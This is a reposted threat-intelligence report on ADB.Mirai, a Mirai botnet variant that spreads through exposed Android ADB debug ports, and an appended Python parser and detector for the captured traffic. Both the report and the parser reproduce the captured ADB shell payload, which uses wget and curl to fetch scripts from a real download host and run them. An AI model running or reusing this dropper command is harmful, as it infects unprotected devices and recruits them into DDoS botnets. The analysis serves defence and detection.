Repost: ADB.Mirai: a new Mirai variant botnet spreading through the ADB debug interface
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;"><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">As early as the beginning of this year, security vendors in China and abroad detected a cryptomining worm spreading through Android devices that expose the ADB debug interface. Recently the passive threat-sensing system of NSFOCUS Fuying Lab (绿盟伏影实验室) again captured a botnet with DDoS capability spreading through the ADB interface. Analysis of the samples shows that this botnet family is yet another new Mirai variant (named Darks by its author), and that part of its scanning behaviour is highly similar to that of the mining samples seen at the start of the year. The difference is that the earlier samples mined cryptocurrency, whereas the current sample performs DDoS attacks, which we suspect is related to the recent downturn in the cryptocurrency market.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;">Introduction</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">This sample comes from the same download source as a group of samples captured earlier, and code characteristics indicate the same author, so we have named the new malicious sample ADB.Mirai. The ADB.Mirai captured this time has shifted from its earlier propagation by brute-forcing weak passwords to propagation through the ADB interface. It is very likely to rapidly take over devices already infected by ADB.Miner and use them as new bots for DDoS attacks. We also expect that botnets and worms which seize mining bots in the same way, or mining worms that iterate into more threatening attack behaviour, will quickly multiply; defenders should take precautions.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;">The Fuying Lab passive threat-sensing system</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">As network security has matured, and especially with the rise of threat intelligence and the continued development of virtualisation technology, deception technology has attracted growing attention. It is one of the key technologies of a threat-sensing system. Its high fidelity, high quality and freshness make it an important means of studying adversaries, and because first-hand threat events are captured in real time there is no longer a reporting lag, which suits the timeliness requirements of threat intelligence well.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">NSFOCUS Fuying Lab has operated a passive threat-sensing system since mid-2017. It has gradually matured, with sensor nodes spread across five continents and more than 20 countries, covering common services, IoT services and industrial control services. It forms a hybrid sensing architecture based on full-port emulation and supplemented by intelligent interactive services, capturing large volumes of fresh threat intelligence from the Internet every day and sensing threats in real time. The Darks worm was captured by this passive threat-sensing system.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;">Attack overview</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Our threat-sensing system first observed an attack from 102.103.123.54 on 19 November, and for the following seven consecutive days received the same attack payload from multiple infected IPs. The attack targets TCP port 5555. Analysis shows that the infected hosts scan for Android devices with the ADB debug port open and abuse the command-execution capability of the debug interface to spread. Once the attacker has dropped and executed the bash script, it downloads multi-platform malware samples from a remote server, turning the compromised host into a bot that continues scanning outward.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Android Debug Bridge (ADB) is the open interface and debugging tool that Android provides for developers. Through ADB one can manage and operate Android emulators and physical devices: install software, inspect hardware and software parameters, upgrade the system, run shell commands, and so on. Some Android devices on the Internet, such as smartphones, smart TVs and set-top boxes, expose the ADB interface with no access control, no password and high privileges; these are exactly the devices infected in this campaign. The sample has worm characteristics: infected devices keep trying to infect other devices and deliver the malicious code to them.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;">Event correlation</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Using the C&amp;C address extracted from the newly captured sample, we searched our passive threat-sensing system and found that the first attack from it dated to 21 October 2018, when the propagation method was brute-forcing weak telnet passwords (</span><b><span lang="EN-US" style="border:none windowtext 1.0pt;color:#777777;font-family:inherit,serif;padding:0cm;">Telnet.Mirai</span></b><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">). Comparing the propagation behaviour of the two samples, the delivery behaviour from this C&amp;C address and the structure of the malicious code, we judge that the same criminal group is behind both campaigns.</span>
</p>
<p align="center" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:center;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Comparison of the samples' propagation timelines</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<img width="554" height="351" src="https://www.2k8.org/content/uploadfile/202211/26/0ffd5135.png" alt="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;">Analysis of the captured sample: ADB.Mirai</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:15.0pt;">Functional description</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:12.0pt;">Worm-style infection</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB.Mirai spreads by abusing the adb interface of Android devices: it randomly generates 359 IP addresses and scans port 5555 on each of them to determine whether an exploitable target may exist. The figure below shows part of the attack payload.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<img width="424" height="310" src="https://www.2k8.org/content/uploadfile/202211/26/78918b13.png" alt="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:12.0pt;">Exclusivity</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB.Mirai inspects process information by reading /proc/pid/, which normally contains a maps file listing the libraries and files loaded into the process's memory mappings. The sample checks whether the maps file contains a specific string ("/tmp/"); if it does, it reports the relevant information to the C&amp;C server and then kills the process. The purpose is to kill other, possibly malicious, programs so that the bot itself gets more of the infected machine's resources.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:12.0pt;">DDoS attacks</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">So far we have found only one attack function, a UDP flood, and analysis shows that the function list initialised before the sample communicates with the C&amp;C likewise contains only that single UDP-Flood function. We suspect the sample is still under development.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:15.0pt;">Comparison of the new and old samples</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:12.0pt;">Name of the old sample: Telnet.Mirai</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">As described in the event correlation section, we also obtained a sample that scans via telnet, which we named Telnet.Mirai.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:12.0pt;">Differences</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Comparing the ADB.Mirai and Telnet.Mirai samples with BinDiff, we found the two to be very similar. Only a few functions differ significantly; one of them, the function that kills other processes, is newly added in ADB.Mirai.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Comparing the scanning modules of the two samples also shows that the ADB.Mirai scanner was derived by modifying the Telnet.Mirai scanning module.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">The bash scripts used also differ. The script used by ADB.Mirai is somewhat more complex than the one used by Telnet.Mirai, adding the ability to kill botkiller and miner bot processes.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">The BinDiff comparison is shown below.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<img width="516" height="210" src="https://www.2k8.org/content/uploadfile/202211/26/21785888.png" alt="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;">Summary</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Comparing the ADB.Mirai and Telnet.Mirai samples, it is easy to see that they come from the same C&amp;C address and that, since 21 October, the samples distributed from that address have changed in both the infection method and the killing of other processes to monopolise the infected machine's resources. We can conclude that the C&amp;C owner is continuously improving the malware, and it is very likely that new samples related to it will be obtained in the future.</span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;">Analysis of the sample source IP</span></b>
</p>
<table border="1" cellpadding="0" cellspacing="0" width="1079" style="background:white;border:none;border-collapse:collapse;font-family:等线;font-size:10.5pt;width:809.5pt;">
<tbody>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">IP address</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">89.46.79.57</span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">Location</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">Italy</span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">ASN number</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">AS31034</span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">ASN information</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">ARUBA-ASN, IT</span>
</p>
</td>
</tr>
</tbody>
</table>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Our honeynet threat-sensing system shows that many infected IPs continuously sent the same attack payload to port 5555 of our honeynet nodes from 20 November 2018 to 26 November 2018 (the download address in every case was the same IP):</span>
</p>
<div style="background:#F8F8F8;border:solid #E2E2E2 1.0pt;padding:2.0pt 6.0pt 2.0pt 6.0pt;">
<p align="left" style="background:#F8F8F8;border:none;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:7.5pt;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;">CNXN\x00\x00\x00\x01\x00\x10\x00\x00\x07\x00\x00\x002\x02\x00\x00\xbc\xb1\xa7\xb1host::\x00OPEN\x82\x00\x00\x00\x00\x00\x00\x00\xbf\x00\x00\x00\xa69\x00\x00\xb0\xaf\xba\xb1shell:cd /data/local/tmp;wget http://89.46.79.57/br -O- >br;sh br;busybox wget http://89.46.79.57/r -O- >r;sh r;curl http://89.46.79.57/c >c;sh c;busybox curl http://89.46.79.57/bc >bc;sh bc\x00</span>
</p>
</div>
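As an added example (not code from the original report or from the Darks sample), the following Python parses the ADB message stream quoted above: it validates each 24-byte header (command, arg0, arg1, data_length, data_check, and magic = command XOR 0xFFFFFFFF), extracts the command line from the `shell:` OPEN, and lists the download URLs so a honeypot pipeline can turn such captures into blocklist entries and a detection rule. The capture bytes are re-typed from the payload above; the function names are my own.

```python
from __future__ import annotations
import re
import struct
from dataclasses import dataclass

# Constructed reproduction of the capture quoted above: a CNXN handshake followed by
# an OPEN to a "shell:" destination. Every ADB header is six little-endian 32-bit
# words: command, arg0, arg1, data_length, data_check, magic (= command ^ 0xFFFFFFFF).
CAPTURE = (
    b"CNXN\x00\x00\x00\x01\x00\x10\x00\x00\x07\x00\x00\x00\x32\x02\x00\x00"
    b"\xbc\xb1\xa7\xb1host::\x00"
    b"OPEN\x82\x00\x00\x00\x00\x00\x00\x00\xbf\x00\x00\x00\xa6\x39\x00\x00"
    b"\xb0\xaf\xba\xb1shell:cd /data/local/tmp;wget http://89.46.79.57/br -O- >br;"
    b"sh br;busybox wget http://89.46.79.57/r -O- >r;sh r;"
    b"curl http://89.46.79.57/c >c;sh c;busybox curl http://89.46.79.57/bc >bc;sh bc\x00"
)

HEADER = struct.Struct("<4sIIIII")          # 24-byte ADB message header
URL_RE = re.compile(r"https?://[^\s;>]+")   # URLs embedded in the remote shell command

@dataclass
class AdbMessage:
    command: str
    arg0: int
    arg1: int
    data: bytes
    magic_ok: bool      # magic == command ^ 0xFFFFFFFF
    checksum_ok: bool   # data_check == sum of payload bytes (mod 2**32)

def parse_adb_stream(buf: bytes) -> list[AdbMessage]:
    """Split a raw byte stream into ADB messages, validating magic and data_check."""
    msgs: list[AdbMessage] = []
    off = 0
    while off + HEADER.size <= len(buf):
        cmd, arg0, arg1, dlen, dcheck, magic = HEADER.unpack_from(buf, off)
        off += HEADER.size
        data = buf[off:off + dlen]
        if len(data) != dlen:
            raise ValueError(f"truncated payload at offset {off}: want {dlen}, got {len(data)}")
        off += dlen
        cmd_int = struct.unpack("<I", cmd)[0]
        msgs.append(AdbMessage(
            command=cmd.decode("ascii", "replace"), arg0=arg0, arg1=arg1, data=data,
            magic_ok=(magic == (cmd_int ^ 0xFFFFFFFF)),
            checksum_ok=(dcheck == (sum(data) & 0xFFFFFFFF)),
        ))
    return msgs

def shell_commands(msgs: list[AdbMessage]) -> list[str]:
    """Command line of every OPEN whose destination is 'shell:' (NUL terminator dropped)."""
    return [m.data[len(b"shell:"):].rstrip(b"\x00").decode("ascii", "replace")
            for m in msgs if m.command == "OPEN" and m.data.startswith(b"shell:")]

def dropper_indicators(msgs: list[AdbMessage]) -> tuple[list[str], list[str]]:
    """URLs (first-seen order, de-duplicated) and hosts the shell command fetches from."""
    urls: list[str] = []
    for cmd in shell_commands(msgs):
        for url in URL_RE.findall(cmd):
            if url not in urls:
                urls.append(url)
    return urls, sorted({u.split("/")[2] for u in urls})

def is_download_and_execute(msgs: list[AdbMessage]) -> bool:
    """Detection heuristic: a shell: OPEN that fetches a file and immediately runs it."""
    return any(("wget" in c or "curl" in c) and ";sh " in c for c in shell_commands(msgs))

if __name__ == "__main__":
    parsed = parse_adb_stream(CAPTURE)
    for m in parsed:
        print(m.command, hex(m.arg0), hex(m.arg1), len(m.data), m.magic_ok, m.checksum_ok)
    print(dropper_indicators(parsed), is_download_and_execute(parsed))
```

Both headers in the capture verify (the CNXN data_check 0x232 is the byte sum of `host::\0`, the OPEN data_check 0x39a6 that of the 191-byte command), so a mismatch on a live sensor points at a truncated or tampered capture rather than at a parser bug.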
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:15.0pt;">Some of the infected IPs</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:15.0pt;">Global distribution of the infected IPs</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="border:none windowtext 1.0pt;color:#777777;font-family:inherit,serif;padding:0cm;"> </span></b><b><img width="554" height="285" src="https://www.2k8.org/content/uploadfile/202211/26/9c88ac05.png" alt="" style="vertical-align:middle;" /></b><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Looking up the sample download IP 89.46.79.57 in our threat-awareness system also showed that this IP scanned ports 23, 81 and 37215 during October and November.</span>
</p>